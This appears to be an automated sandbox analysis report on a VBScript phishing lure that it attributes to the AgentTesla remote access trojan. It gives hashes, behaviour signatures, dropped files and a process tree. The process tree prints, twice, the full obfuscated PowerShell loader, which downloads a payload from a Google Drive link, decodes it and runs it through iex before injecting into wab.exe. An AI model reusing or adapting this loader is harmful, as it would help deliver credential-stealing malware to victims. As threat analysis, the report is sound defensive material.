Analysis

  • max time kernel
    144s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20240508-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    21/05/2024, 03:42

General

  • Target

    RFQINL21052024_PRICE SCHEDULE.vbs

  • Size

    4KB

  • MD5

    de9bd11a9b255ed79c168051414c5ec2

  • SHA1

    863a99be31ef99e905bd44e472fd342b7104777b

  • SHA256

    841bfb8481e179f4d401d0b58b8230eb7c474914e3ca2e4e550e0dc9ef231113

  • SHA512

    361f095e88a387dd164350c35f80d4bc5ac1b440dc4cddff4c4e6529d863791a23997a5f97a0c803594c933dbc0fd537435b9b507815ca836396d0ec828a63bb

  • SSDEEP

    96:QhlUfeZsBmpDAcPV1kW//GOsxoJ8YFlRhpeilDg33FPU0C+WEKfp:Q3r8cPnx/Go5kilQfCXEKfp

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. 
DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
        3⤵
          PID:5044
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. 
DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:404
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
            4⤵
              PID:4608
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2484

      Network

            MITRE ATT&CK Enterprise v15

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x341cxg3.ega.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Roaming\Vigesimation.Sor

              Filesize

              517KB

              MD5

              3d5345e787f5607ceeab0031c358f539

              SHA1

              19dc82bb214aa4cedc883e99d3d29b196d83a330

              SHA256

              dc9e8d1b6623366e4063a886706dc448452d26c216d2c450e9f4c89a963f18d2

              SHA512

              8f57a41e65493c8747dab6c4880e6de94b4eb8b6249a0d4c7063f65952de0c72990e9d9382f43c72142c1351247b1bbe99a915effd81507c2a9f76c12ed2720f

            • memory/404-33-0x0000000006EB0000-0x0000000006ECA000-memory.dmp

              Filesize

              104KB

            • memory/404-19-0x0000000006300000-0x0000000006366000-memory.dmp

              Filesize

              408KB

            • memory/404-34-0x0000000007BD0000-0x0000000007C66000-memory.dmp

              Filesize

              600KB

            • memory/404-15-0x0000000003030000-0x0000000003066000-memory.dmp

              Filesize

              216KB

            • memory/404-16-0x0000000005AC0000-0x00000000060E8000-memory.dmp

              Filesize

              6.2MB

            • memory/404-17-0x0000000005A90000-0x0000000005AB2000-memory.dmp

              Filesize

              136KB

            • memory/404-18-0x0000000006220000-0x0000000006286000-memory.dmp

              Filesize

              408KB

            • memory/404-36-0x0000000008BC0000-0x0000000009164000-memory.dmp

              Filesize

              5.6MB

            • memory/404-29-0x0000000006370000-0x00000000066C4000-memory.dmp

              Filesize

              3.3MB

            • memory/404-30-0x0000000006930000-0x000000000694E000-memory.dmp

              Filesize

              120KB

            • memory/404-31-0x0000000006960000-0x00000000069AC000-memory.dmp

              Filesize

              304KB

            • memory/404-32-0x0000000007F90000-0x000000000860A000-memory.dmp

              Filesize

              6.5MB

            • memory/404-35-0x0000000007B60000-0x0000000007B82000-memory.dmp

              Filesize

              136KB

            • memory/404-38-0x0000000009170000-0x000000000C2CC000-memory.dmp

              Filesize

              49.4MB

            • memory/916-58-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp

              Filesize

              10.8MB

            • memory/916-40-0x00007FFEC3B23000-0x00007FFEC3B25000-memory.dmp

              Filesize

              8KB

            • memory/916-1-0x0000024137150000-0x0000024137172000-memory.dmp

              Filesize

              136KB

            • memory/916-0-0x00007FFEC3B23000-0x00007FFEC3B25000-memory.dmp

              Filesize

              8KB

            • memory/916-11-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp

              Filesize

              10.8MB

            • memory/916-41-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp

              Filesize

              10.8MB

            • memory/916-12-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp

              Filesize

              10.8MB

            • memory/2484-54-0x0000000001270000-0x00000000024C4000-memory.dmp

              Filesize

              18.3MB

            • memory/2484-55-0x0000000001270000-0x00000000012B2000-memory.dmp

              Filesize

              264KB

            • memory/2484-59-0x0000000023A90000-0x0000000023AE0000-memory.dmp

              Filesize

              320KB

            • memory/2484-60-0x0000000023B80000-0x0000000023C12000-memory.dmp

              Filesize

              584KB

            • memory/2484-61-0x0000000023A80000-0x0000000023A8A000-memory.dmp

              Filesize

              40KB